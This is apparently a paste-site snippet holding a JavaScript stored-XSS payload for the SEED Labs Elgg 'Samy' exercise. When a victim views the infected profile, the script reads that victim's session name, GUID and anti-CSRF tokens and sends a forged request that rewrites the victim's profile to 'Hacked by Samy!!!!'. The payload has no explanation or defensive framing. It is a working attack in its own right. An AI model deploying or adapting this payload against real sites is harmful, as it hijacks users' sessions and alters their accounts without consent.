Untitled

avatar
unknown
javascript
2 years ago
1.0 kB
4
Indexable
<script type="text/javascript">
window.onload = function(){
    //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
    //and Security Token __elgg_token
    var userName="&name="+elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
    
    var description="&description=Hacked by Samy!!!!";
    
    var content=token + ts + userName + description + guid;
​
    var samyGuid=47;
​
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
    
    if(elgg.session.user.guid!=samyGuid)
    {
        //Create and send Ajax request to modify profile
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",sendurl,true);
        Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        Ajax.setRequestHeader("Content-Type", 
                              "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>
Editor is loading...